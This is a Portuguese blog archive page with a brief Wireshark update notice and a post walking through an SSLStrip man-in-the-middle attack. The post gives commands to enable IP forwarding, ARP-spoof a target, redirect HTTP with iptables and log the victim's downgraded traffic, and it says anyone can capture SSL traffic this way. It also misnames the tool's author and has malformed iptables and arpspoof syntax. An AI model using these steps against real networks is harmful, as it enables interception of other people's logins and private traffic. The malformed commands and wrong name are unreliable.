Feeds:
Posts
Comments

Archive for the ‘SSL’ Category

Como analisador de protocolos de rede mais popular do mundo , o Wireshark tem agora uma atualização para as versões 1.4.4 e 1.2.15. Esta atualização corrige muitas vulnerabilidades , tais como :CVE-2011-0538, CVE-2011-0713 e o NTLMSSP dissector.

Os protocolos a seguir foram atualizados : ANSI MAP, BitTorrent, DCM, DHCPv6, DTAP, DTPT, E.212, GSM Management, GTP, HIP, IEEE 802.15.4, IPP, LDAP, LLDP, Netflow, NTLMSSP, P_Mul, Quake, Skinny, SMB, SNMP, ULP. Além disso, você pode ler as capturas através do LANalyzer, Nokia DCT3, e arquivos no formato Pcap-ng.

Para obter uma lista completa das alterações, veja:
Docs: – http://www.wireshark.org
Download: http://www.wireshark.org
Fonte: http://www.pentestit.com

Read Full Post »

Desde que Moxie Moulinsart exibiu seu SSLStrip na Blackhat, o MODO PARANÓICO de muitas pessoas começou a dar o alarme, e não é pra menos, já que com essa ferramenta qualquer pessoa pode capturar seu tráfego SSL sem problemas.

O funcionamento do SSLStrip é simples, substituindo todas as requisições “https://” de uma página por “http://”, e realiza um MITM (Man-In-The-Middle) entre o servidor e o cliente.
A ideia é que a vítima e o atacante se comuniquem através de HTTP, enquanto o atacante e o servidor se comunicam em HTTPS, com o certificado do servidor. Portanto, o atacante é capaz de ver todo o tráfego da vítima em texto plano.

Resumidamente, os passos seriam:

Configurar o IP Forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Realizar um ataque ARP MITM entre as 2 máquinas:
# arpspoof -i eth0 -t HOST_ALVO

Redirecionar o tráfego com iptables:
# iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-ports 8080

Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:
# python sslstrip.py -w archivo

Espero que achem interessante!

Página oficial do SSLStrip: http://www.thoughtcrime.org/software/sslstrip/

Publicado por Luiz Vieira

Read Full Post »